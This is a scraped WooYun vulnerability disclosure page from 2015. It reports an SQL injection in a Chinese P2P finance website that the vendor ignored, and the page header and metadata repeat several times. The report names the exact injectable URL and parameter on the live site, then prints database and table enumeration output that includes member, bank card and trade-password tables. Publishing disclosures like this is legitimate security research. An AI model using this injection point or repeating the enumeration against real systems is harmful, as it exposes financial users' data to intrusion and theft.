银证金融主站某处sql注入（敏感信息泄漏）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126142

漏洞标题：银证金融主站某处sql注入（敏感信息泄漏）

漏洞作者：路人甲

提交时间：2015-07-14 19:26

修复时间：2015-08-28 19:28

公开时间：2015-08-28 19:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-14：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-28：厂商已经主动忽略漏洞，细节向公众公开
简要描述：

一个p2p金融sql注入，导致金融系统跟商城系统沦陷
详细说明：

注入点：http://www.yinzhengjinrong.com/edu/index.php?g=news&m=article&a=page&id=2205
id存在注入
影响
http://www.yinzhengjinrong.com
http://www.yinzhengtouzi.com/
漏洞证明：

数据库：
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] yfjr
[*] yfshop
Database: yfshop
[127 tables]
+-----------------------+
| imall_admin_group     |
| imall_admin_log       |
| imall_admin_user      |
| imall_areas           |
| imall_article         |
| imall_article_cat     |
| imall_asd_content     |
| imall_asd_position    |
| imall_attribute       |
| imall_brand           |
| imall_brand_category  |
| imall_cart            |
| imall_category        |
| imall_category_copy   |
| imall_complaint_type  |
| imall_complaints      |
| imall_credit          |
| imall_crons           |
| imall_flink           |
| imall_goods           |
| imall_goods_attr      |
| imall_goods_comment   |
| imall_goods_gallery   |
| imall_goods_shipping  |
| imall_goods_transport |
| imall_goods_types     |
| imall_groupbuy        |
| imall_groupbuy_log    |
| imall_img_size        |
| imall_index_images    |
| imall_integral        |
| imall_keywords_count  |
| imall_mailtpl         |
| imall_nav             |
| imall_order_goods     |
| imall_order_info      |
| imall_payment         |
| imall_plugin_url      |
| imall_plugins         |
| imall_privilege       |
| imall_protect_rights  |
| imall_receiv_list     |
| imall_refund_list     |
| imall_remind          |
| imall_remind_info     |
| imall_remind_user     |
| imall_settings        |
| imall_shipping        |
| imall_shipping_list   |
| imall_shop_article    |
| imall_shop_categories |
| imall_shop_category   |
| imall_shop_guestbook  |
| imall_shop_honor      |
| imall_shop_info       |
| imall_shop_inquiry    |
| imall_shop_payment    |
| imall_shop_request    |
| imall_tag             |
| imall_tag_user        |
| imall_tmp_img         |
| imall_transport       |
| imall_user_address    |
| imall_user_favorite   |
| imall_user_info       |
| imall_user_rank       |
| imall_users           |
| imall_word            |
| mc_action             |
| mc_attached           |
| mc_meta               |
| mc_option             |
| mc_page               |
| pe_ad                 |
| pe_admin              |
| pe_article            |
| pe_ask                |
| pe_brand              |
| pe_cart               |
| pe_category           |
| pe_class              |
| pe_collect            |
| pe_comment            |
| pe_iplog              |
| pe_link               |
| pe_menu               |
| pe_order              |
| pe_orderdata          |
| pe_page               |
| pe_payway             |
| pe_product            |
| pe_prorule            |
| pe_rule               |
| pe_ruledata           |
| pe_setting            |
| pe_user               |
| uc_admins             |
| uc_applications       |
| uc_badwords           |
| uc_domains            |
| uc_failedlogins       |
| uc_feeds              |
| uc_friends            |
| uc_mailqueue          |
| uc_memberfields       |
| uc_members            |
| uc_mergemembers       |
| uc_newpm              |
| uc_notelist           |
| uc_pm_indexes         |
| uc_pm_lists           |
| uc_pm_members         |
| uc_pm_messages_0      |
| uc_pm_messages_1      |
| uc_pm_messages_2      |
| uc_pm_messages_3      |
| uc_pm_messages_4      |
| uc_pm_messages_5      |
| uc_pm_messages_6      |
| uc_pm_messages_7      |
| uc_pm_messages_8      |
| uc_pm_messages_9      |
| uc_protectedmembers   |
| uc_settings           |
| uc_sqlcache           |
| uc_tags               |
| uc_vars               |
+-----------------------+
Database: yfjr
[781 tables]
+--------------------------------------+
| dr_1_block                           |
| dr_1_down                            |
| dr_1_down_buy_0                      |
| dr_1_down_buy_1                      |
| dr_1_down_buy_2                      |
| dr_1_down_buy_3                      |
| dr_1_down_buy_4                      |
| dr_1_down_buy_5                      |
| dr_1_down_buy_6                      |
| dr_1_down_buy_7                      |
| dr_1_down_buy_8                      |
| dr_1_down_buy_9                      |
| dr_1_down_category                   |
| dr_1_down_category_data              |
| dr_1_down_category_data_0            |
| dr_1_down_data_0                     |
| dr_1_down_extend                     |
| dr_1_down_favorite_0                 |
| dr_1_down_favorite_1                 |
| dr_1_down_favorite_2                 |
| dr_1_down_favorite_3                 |
| dr_1_down_favorite_4                 |
| dr_1_down_favorite_5                 |
| dr_1_down_favorite_6                 |
| dr_1_down_favorite_7                 |
| dr_1_down_favorite_8                 |
| dr_1_down_favorite_9                 |
| dr_1_down_flag                       |
| dr_1_down_form                       |
| dr_1_down_html                       |
| dr_1_down_index                      |
| dr_1_down_search                     |
| dr_1_down_tag                        |
| dr_1_down_verify                     |
| dr_1_form                            |
| dr_1_navigator                       |
| dr_1_news                            |
| dr_1_news_buy_0                      |
| dr_1_news_buy_1                      |
| dr_1_news_buy_2                      |
| dr_1_news_buy_3                      |
| dr_1_news_buy_4                      |
| dr_1_news_buy_5                      |
| dr_1_news_buy_6                      |
| dr_1_news_buy_7                      |
| dr_1_news_buy_8                      |
| dr_1_news_buy_9                      |
| dr_1_news_category                   |
| dr_1_news_category_data              |
| dr_1_news_category_data_0            |
| dr_1_news_data_0                     |
| dr_1_news_extend                     |
| dr_1_news_favorite_0                 |
| dr_1_news_favorite_1                 |
| dr_1_news_favorite_2                 |
| dr_1_news_favorite_3                 |
| dr_1_news_favorite_4                 |
| dr_1_news_favorite_5                 |
| dr_1_news_favorite_6                 |
| dr_1_news_favorite_7                 |
| dr_1_news_favorite_8                 |
| dr_1_news_favorite_9                 |
| dr_1_news_flag                       |
| dr_1_news_form                       |
| dr_1_news_html                       |
| dr_1_news_index                      |
| dr_1_news_search                     |
| dr_1_news_tag                        |
| dr_1_news_verify                     |
| dr_1_page                            |
| dr_1_photo                           |
| dr_1_photo_buy_0                     |
| dr_1_photo_buy_1                     |
| dr_1_photo_buy_2                     |
| dr_1_photo_buy_3                     |
| dr_1_photo_buy_4                     |
| dr_1_photo_buy_5                     |
| dr_1_photo_buy_6                     |
| dr_1_photo_buy_7                     |
| dr_1_photo_buy_8                     |
| dr_1_photo_buy_9                     |
| dr_1_photo_category                  |
| dr_1_photo_category_data             |
| dr_1_photo_category_data_0           |
| dr_1_photo_data_0                    |
| dr_1_photo_extend                    |
| dr_1_photo_favorite_0                |
| dr_1_photo_favorite_1                |
| dr_1_photo_favorite_2                |
| dr_1_photo_favorite_3                |
| dr_1_photo_favorite_4                |
| dr_1_photo_favorite_5                |
| dr_1_photo_favorite_6                |
| dr_1_photo_favorite_7                |
| dr_1_photo_favorite_8                |
| dr_1_photo_favorite_9                |
| dr_1_photo_flag                      |
| dr_1_photo_form                      |
| dr_1_photo_html                      |
| dr_1_photo_index                     |
| dr_1_photo_search                    |
| dr_1_photo_tag                       |
| dr_1_photo_verify                    |
| dr_1_video                           |
| dr_1_video_buy_0                     |
| dr_1_video_buy_1                     |
| dr_1_video_buy_2                     |
| dr_1_video_buy_3                     |
| dr_1_video_buy_4                     |
| dr_1_video_buy_5                     |
| dr_1_video_buy_6                     |
| dr_1_video_buy_7                     |
| dr_1_video_buy_8                     |
| dr_1_video_buy_9                     |
| dr_1_video_category                  |
| dr_1_video_category_data             |
| dr_1_video_category_data_0           |
| dr_1_video_data_0                    |
| dr_1_video_extend                    |
| dr_1_video_extend_0                  |
| dr_1_video_favorite_0                |
| dr_1_video_favorite_1                |
| dr_1_video_favorite_2                |
| dr_1_video_favorite_3                |
| dr_1_video_favorite_4                |
| dr_1_video_favorite_5                |
| dr_1_video_favorite_6                |
| dr_1_video_favorite_7                |
| dr_1_video_favorite_8                |
| dr_1_video_favorite_9                |
| dr_1_video_flag                      |
| dr_1_video_form                      |
| dr_1_video_html                      |
| dr_1_video_index                     |
| dr_1_video_search                    |
| dr_1_video_tag                       |
| dr_1_video_verify                    |
| dr_2_form                            |
| dr_admin                             |
| dr_admin_menu                        |
| dr_admin_role                        |
| dr_admin_verify                      |
| dr_app_comment                       |
| dr_app_comment_data_0                |
| dr_app_comment_verify                |
| dr_app_vote                          |
| dr_application                       |
| dr_attachment                        |
| dr_attachment_0                      |
| dr_attachment_1                      |
| dr_attachment_2                      |
| dr_attachment_3                      |
| dr_attachment_4                      |
| dr_attachment_5                      |
| dr_attachment_6                      |
| dr_attachment_7                      |
| dr_attachment_8                      |
| dr_attachment_9                      |
| dr_attachment_unused                 |
| dr_cron_queue                        |
| dr_field                             |
| dr_linkage                           |
| dr_linkage_data_1                    |
| dr_mail_queue                        |
| dr_mail_smtp                         |
| dr_member                            |
| dr_member_address                    |
| dr_member_data                       |
| dr_member_group                      |
| dr_member_level                      |
| dr_member_menu                       |
| dr_member_new_notice                 |
| dr_member_notice_0                   |
| dr_member_notice_1                   |
| dr_member_notice_2                   |
| dr_member_notice_3                   |
| dr_member_notice_4                   |
| dr_member_notice_5                   |
| dr_member_notice_6                   |
| dr_member_notice_7                   |
| dr_member_notice_8                   |
| dr_member_notice_9                   |
| dr_member_oauth                      |
| dr_member_paycard                    |
| dr_member_paylog_0                   |
| dr_member_paylog_1                   |
| dr_member_paylog_2                   |
| dr_member_paylog_3                   |
| dr_member_paylog_4                   |
| dr_member_paylog_5                   |
| dr_member_paylog_6                   |
| dr_member_paylog_7                   |
| dr_member_paylog_8                   |
| dr_member_paylog_9                   |
| dr_member_scorelog_0                 |
| dr_member_scorelog_1                 |
| dr_member_scorelog_2                 |
| dr_member_scorelog_3                 |
| dr_member_scorelog_4                 |
| dr_member_scorelog_5                 |
| dr_member_scorelog_6                 |
| dr_member_scorelog_7                 |
| dr_member_scorelog_8                 |
| dr_member_scorelog_9                 |
| dr_member_session                    |
| dr_member_setting                    |
| dr_module                            |
| dr_newpm                             |
| dr_pm_indexes                        |
| dr_pm_lists                          |
| dr_pm_members                        |
| dr_pm_messages_0                     |
| dr_pm_messages_1                     |
| dr_pm_messages_2                     |
| dr_pm_messages_3                     |
| dr_pm_messages_4                     |
| dr_pm_messages_5                     |
| dr_pm_messages_6                     |
| dr_pm_messages_7                     |
| dr_pm_messages_8                     |
| dr_pm_messages_9                     |
| dr_site                              |
| dr_space                             |
| dr_space_category                    |
| dr_space_flag                        |
| dr_space_link                        |
| dr_space_log                         |
| dr_space_model                       |
| dr_space_news                        |
| dr_space_photo                       |
| dr_space_slides                      |
| dr_urlrule                           |
| j_access                             |
| j_ad                                 |
| j_admin_operation_log                |
| j_admin_panel                        |
| j_admin_red_envelope                 |
| j_amount_extract                     |
| j_apply_loan_info                    |
| j_apply_loan_info_backup             |
| j_apply_loan_info_history            |
| j_asset                              |
| j_bank                               |
| j_book                               |
| j_certificate_audit                  |
| j_certifiction_show                  |
| j_ci_session                         |
| j_comment                            |
| j_commentmeta                        |
| j_comments                           |
| j_config                             |
| j_friends_plan                       |
| j_friends_time                       |
| j_gold_rule                          |
| j_interface_data                     |
| j_item_car                           |
| j_item_category                      |
| j_item_content                       |
| j_item_content_summary               |
| j_item_content_summary_files         |
| j_item_content_type                  |
| j_item_focus                         |
| j_item_guarantee                     |
| j_item_operaction_log                |
| j_links                              |
| j_loan                               |
| j_loan_userinfo                      |
| j_loginlog                           |
| j_member                             |
| j_member_account                     |
| j_member_account_daily               |
| j_member_account_record              |
| j_member_activation                  |
| j_member_assets                      |
| j_member_auth                        |
| j_member_auth_file_log               |
| j_member_auth_img                    |
| j_member_auth_img_history            |
| j_member_auth_log                    |
| j_member_auth_type                   |
| j_member_backup                      |
| j_member_bankcard                    |
| j_member_content                     |
| j_member_credit_name                 |
| j_member_credit_rank                 |
| j_member_credit_score                |
| j_member_detail                      |
| j_member_detail_email                |
| j_member_detail_mobile               |
| j_member_edu_info                    |
| j_member_infraction                  |
| j_member_job_info                    |
| j_member_level                       |
| j_member_offline                     |
| j_member_offline_interest_settlement |
| j_member_offline_list                |
| j_member_offline_name                |
| j_member_service                     |
| j_menu                               |
| j_nav                                |
| j_nav_cat                            |
| j_news                               |
| j_oauth_member                       |
| j_operationlog                       |
| j_options                            |
| j_payment_detail                     |
| j_postmeta                           |
| j_posts                              |
| j_red_envelope                       |
| j_red_envelope_name                  |
| j_role                               |
| j_role_user                          |
| j_send_email_log                     |
| j_send_message_log                   |
| j_send_news                          |
| j_sfrz                               |
| j_sfrz_history                       |
| j_sfrz_img                           |
| j_sfrz_log                           |
| j_siteconfig                         |
| j_slide                              |
| j_slide_cat                          |
| j_t_atusers                          |
| j_t_blacklist                        |
| j_t_careers                          |
| j_t_comments                         |
| j_t_content                          |
| j_t_content_mention                  |
| j_t_content_topic                    |
| j_t_district                         |
| j_t_edus                             |
| j_t_emotions                         |
| j_t_favorite                         |
| j_t_forbidip                         |
| j_t_friend                           |
| j_t_groups                           |
| j_t_groupuids                        |
| j_t_invitecode                       |
| j_t_loginbind                        |
| j_t_logindt                          |
| j_t_messages                         |
| j_t_myapps                           |
| j_t_mytopic                          |
| j_t_plugins                          |
| j_t_praise                           |
| j_t_regip                            |
| j_t_report                           |
| j_t_system                           |
| j_t_tags                             |
| j_t_tongji                           |
| j_t_topic                            |
| j_t_topicwidget                      |
| j_t_url                              |
| j_t_users                            |
| j_t_usertags                         |
| j_t_verified                         |
| j_t_vipgroup                         |
| j_t_votecomment                      |
| j_t_voteoptions                      |
| j_t_votes                            |
| j_t_voteusers                        |
| j_t_weibobind                        |
| j_t_words                            |
| j_tags                               |
| j_term_relationships                 |
| j_terms                              |
| j_top_up_record                      |
| j_top_up_record_log                  |
| j_trade_auction                      |
| j_trade_bank                         |
| j_trade_cart                         |
| j_trade_interest_revenue             |
| j_trade_item_pay_desc                |
| j_trade_item_pay_plan                |
| j_trade_item_pay_plan_actionp_log    |
| j_trade_item_pay_plan_bak0316        |
| j_trade_log_recorderebate            |
| j_trade_member_service_record        |
| j_trade_order                        |
| j_trade_password                     |
| j_trade_rebatetask                   |
| j_trade_rebatetask_bak0316           |
| j_usermeta                           |
| j_users                              |
| j_video                              |
| j_vip_service                        |
| mytest                               |
| sp_access                            |
| sp_ad                                |
| sp_admin_panel                       |
| sp_asset                             |
| sp_commentmeta                       |
| sp_links                             |
| sp_members                           |
| sp_menu                              |
| sp_nav                               |
| sp_nav_cat                           |
| sp_oauth_member                      |
| sp_options                           |
| sp_postmeta                          |
| sp_posts                             |
| sp_role                              |
| sp_role_user                         |
| sp_slide                             |
| sp_slide_cat                         |
| sp_term_relationships                |
| sp_terms                             |
| sp_usermeta                          |
| sp_users                             |
| t_ad                                 |
| t_album                              |
| t_api_oauth2_code                    |
| t_api_oauth2_token                   |
| t_app                                |
| t_attach_category                    |
| t_atusers                            |
| t_blacklist                          |
| t_buddy_channel                      |
| t_buddy_fans                         |
| t_buddy_fans_1                       |
| t_buddy_fans_10                      |
| t_buddy_fans_2                       |
| t_buddy_fans_3                       |
| t_buddy_fans_4                       |
| t_buddy_fans_5                       |
| t_buddy_fans_6                       |
| t_buddy_fans_7                       |
| t_buddy_fans_8                       |
| t_buddy_fans_9                       |
| t_buddy_fans_table_id                |
| t_buddy_follow                       |
| t_buddy_follow_1                     |
| t_buddy_follow_10                    |
| t_buddy_follow_2                     |
| t_buddy_follow_3                     |
| t_buddy_follow_4                     |
| t_buddy_follow_5                     |
| t_buddy_follow_6                     |
| t_buddy_follow_7                     |
| t_buddy_follow_8                     |
| t_buddy_follow_9                     |
| t_buddy_follow_group                 |
| t_buddy_follow_group_relation        |
| t_buddy_follow_group_relation_1      |
| t_buddy_follow_group_relation_10     |
| t_buddy_follow_group_relation_2      |
| t_buddy_follow_group_relation_3      |
| t_buddy_follow_group_relation_4      |
| t_buddy_follow_group_relation_5      |
| t_buddy_follow_group_relation_6      |
| t_buddy_follow_group_relation_7      |
| t_buddy_follow_group_relation_8      |
| t_buddy_follow_group_relation_9      |
| t_buddy_follow_table_id              |
| t_buddys                             |
| t_bulletin                           |
| t_cache                              |
| t_cache_1                            |
| t_cache_10                           |
| t_cache_11                           |
| t_cache_12                           |
| t_cache_13                           |
| t_cache_14                           |
| t_cache_15                           |
| t_cache_2                            |
| t_cache_3                            |
| t_cache_4                            |
| t_cache_5                            |
| t_cache_6                            |
| t_cache_7                            |
| t_cache_8                            |
| t_cache_9                            |
| t_careers                            |
| t_channel                            |
| t_channel_type                       |
| t_cms_article                        |
| t_cms_category                       |
| t_cms_reply                          |
| t_comments                           |
| t_common_district                    |
| t_common_member_profile_setting      |
| t_content                            |
| t_content_mention                    |
| t_content_topic                      |
| t_credits_log                        |
| t_credits_rule                       |
| t_credits_rule_log                   |
| t_cron                               |
| t_district                           |
| t_edus                               |
| t_emotions                           |
| t_event                              |
| t_event_favorite                     |
| t_event_member                       |
| t_event_sort                         |
| t_failedlogins                       |
| t_favorite                           |
| t_feature                            |
| t_feed_log                           |
| t_forbidip                           |
| t_force_out                          |
| t_friend                             |
| t_group                              |
| t_groupfields                        |
| t_groups                             |
| t_groupuids                          |
| t_invite                             |
| t_invitecode                         |
| t_ios                                |
| t_item_sms                           |
| t_item_user                          |
| t_job                                |
| t_kaixin_bind_info                   |
| t_kaixin_bind_topic                  |
| t_live                               |
| t_log                                |
| t_login_log                          |
| t_loginbind                          |
| t_logindt                            |
| t_mailqueue                          |
| t_mall_goods                         |
| t_mall_order                         |
| t_mall_order_action                  |
| t_manage_detail                      |
| t_medal                              |
| t_medal_apply                        |
| t_media                              |
| t_member_relation                    |
| t_member_table_id                    |
| t_member_topic                       |
| t_member_validate                    |
| t_memberfields                       |
| t_members                            |
| t_members_profile                    |
| t_members_verify                     |
| t_members_vest                       |
| t_messages                           |
| t_my_tag                             |
| t_my_topic_tag                       |
| t_myapps                             |
| t_mytopic                            |
| t_notice                             |
| t_output                             |
| t_plugin                             |
| t_plugins                            |
| t_pluginvar                          |
| t_pms                                |
| t_pms_index                          |
| t_pms_list                           |
| t_praise                             |
| t_qqwb_bind_info                     |
| t_qqwb_bind_topic                    |
| t_qun                                |
| t_qun_announcement                   |
| t_qun_apply                          |
| t_qun_category                       |
| t_qun_event                          |
| t_qun_level                          |
| t_qun_ploy                           |
| t_qun_tag                            |
| t_qun_tag_fields                     |
| t_qun_user                           |
| t_qun_vote                           |
| t_regip                              |
| t_renren_bind_info                   |
| t_renren_bind_topic                  |
| t_report                             |
| t_reward                             |
| t_reward_image                       |
| t_reward_user                        |
| t_reward_win_user                    |
| t_robot                              |
| t_robot_ip                           |
| t_robot_log                          |
| t_role                               |
| t_role_action                        |
| t_role_module                        |
| t_schedule                           |
| t_sessions                           |
| t_setting                            |
| t_share                              |
| t_sign_tag                           |
| t_site                               |
| t_sms_client_user                    |
| t_sms_failedlogins                   |
| t_sms_receive_log                    |
| t_sms_send_log                       |
| t_sms_send_queue                     |
| t_system                             |
| t_tag                                |
| t_tag_extra                          |
| t_tag_favorite                       |
| t_tag_recommend                      |
| t_tags                               |
| t_talk                               |
| t_talk_category                      |
| t_task                               |
| t_task_log                           |
| t_tongji                             |
| t_topic                              |
| t_topic_api                          |
| t_topic_attach                       |
| t_topic_channel                      |
| t_topic_dig                          |
| t_topic_event                        |
| t_topic_favorite                     |
| t_topic_image                        |
| t_topic_live                         |
| t_topic_longtext                     |
| t_topic_mall                         |
| t_topic_mention                      |
| t_topic_more                         |
| t_topic_music                        |
| t_topic_qun                          |
| t_topic_recommend                    |
| t_topic_relation                     |
| t_topic_relation_table_id            |
| t_topic_reply                        |
| t_topic_reward                       |
| t_topic_show                         |
| t_topic_table_id                     |
| t_topic_tag                          |
| t_topic_talk                         |
| t_topic_topic_image                  |
| t_topic_url                          |
| t_topic_verify                       |
| t_topic_video                        |
| t_topic_vote                         |
| t_topicwidget                        |
| t_url                                |
| t_user_medal                         |
| t_user_tag                           |
| t_user_tag_fields                    |
| t_users                              |
| t_usertags                           |
| t_validate_category                  |
| t_validate_category_fields           |
| t_validate_extra                     |
| t_verified                           |
| t_vipgroup                           |
| t_vote                               |
| t_vote_field                         |
| t_vote_image                         |
| t_vote_option                        |
| t_vote_user                          |
| t_vote_user_lottery                  |
| t_votecomment                        |
| t_voteoptions                        |
| t_votes                              |
| t_voteusers                          |
| t_wall                               |
| t_wall_draft                         |
| t_wall_material                      |
| t_wall_playlist                      |
| t_wechat                             |
| t_weibobind                          |
| t_words                              |
| t_xwb_bind_info                      |
| t_xwb_bind_topic                     |
| t_yy_bind_info                       |
| trade_password                       |
| ts_ad                                |
| ts_addons                            |
| ts_app                               |
| ts_app_tag                           |
| ts_area                              |
| ts_atme                              |
| ts_attach                            |
| ts_channel                           |
| ts_channel_category                  |
| ts_channel_follow                    |
| ts_check_info                        |
| ts_collection                        |
| ts_comment                           |
| ts_credit_setting                    |
| ts_credit_type                       |
| ts_credit_user                       |
| ts_denounce                          |
| ts_department                        |
| ts_diy_canvas                        |
| ts_diy_page                          |
| ts_diy_widget                        |
| ts_expression                        |
| ts_feed                              |
| ts_feed_data                         |
| ts_feed_digg                         |
| ts_feed_node                         |
| ts_feed_topic                        |
| ts_feed_topic_link                   |
| ts_feedback                          |
| ts_feedback_type                     |
| ts_find_password                     |
| ts_group                             |
| ts_group_album                       |
| ts_group_atme                        |
| ts_group_attachment                  |
| ts_group_category                    |
| ts_group_comment                     |
| ts_group_feed                        |
| ts_group_feed_data                   |
| ts_group_invite_verify               |
| ts_group_log                         |
| ts_group_member                      |
| ts_group_photo                       |
| ts_group_post                        |
| ts_group_tag                         |
| ts_group_topic                       |
| ts_group_topic_category              |
| ts_group_topic_collect               |
| ts_group_user_count                  |
| ts_invite_code                       |
| ts_lang                              |
| ts_login                             |
| ts_login_logs                        |
| ts_login_record                      |
| ts_medal                             |
| ts_medal_user                        |
| ts_message_content                   |
| ts_message_list                      |
| ts_message_member                    |
| ts_navi                              |
| ts_notify_email                      |
| ts_notify_message                    |
| ts_notify_node                       |
| ts_online                            |
| ts_online_logs                       |
| ts_online_stats                      |
| ts_permission_group                  |
| ts_permission_node                   |
| ts_pic_show                          |
| ts_schedule                          |
| ts_search                            |
| ts_search_key                        |
| ts_search_select                     |
| ts_system_config                     |
| ts_system_data                       |
| ts_system_update                     |
| ts_tag                               |
| ts_task                              |
| ts_task_custom                       |
| ts_task_receive                      |
| ts_task_reward                       |
| ts_task_user                         |
| ts_template                          |
| ts_template_record                   |
| ts_tips                              |
| ts_ucenter_user_link                 |
| ts_user                              |
| ts_user_app                          |
| ts_user_blacklist                    |
| ts_user_category                     |
| ts_user_category_link                |
| ts_user_change_style                 |
| ts_user_credit_history               |
| ts_user_data                         |
| ts_user_department                   |
| ts_user_follow                       |
| ts_user_follow_group                 |
| ts_user_follow_group_link            |
| ts_user_group                        |
| ts_user_group_link                   |
| ts_user_official                     |
| ts_user_official_category            |
| ts_user_online                       |
| ts_user_privacy                      |
| ts_user_profile                      |
| ts_user_profile_setting              |
| ts_user_verified                     |
| ts_user_verified_category            |
| ts_weiba                             |
| ts_weiba_apply                       |
| ts_weiba_category                    |
| ts_weiba_favorite                    |
| ts_weiba_follow                      |
| ts_weiba_log                         |
| ts_weiba_post                        |
| ts_weiba_reply                       |
| ts_x_article                         |
| ts_x_logs                            |
| ttt                                  |
| webuser_temp                         |
+--------------------------------------+
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126142

漏洞标题：银证金融主站某处sql注入（敏感信息泄漏）

相关厂商：北京银丰网络科技有限公司

漏洞作者：路人甲

提交时间：2015-07-14 19:26

修复时间：2015-08-28 19:28

公开时间：2015-08-28 19:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126142

漏洞标题：银证金融主站某处sql注入（敏感信息泄漏）

相关厂商：北京银丰网络科技有限公司

漏洞作者： 路人甲

提交时间：2015-07-14 19:26

修复时间：2015-08-28 19:28

公开时间：2015-08-28 19:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0126142"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云
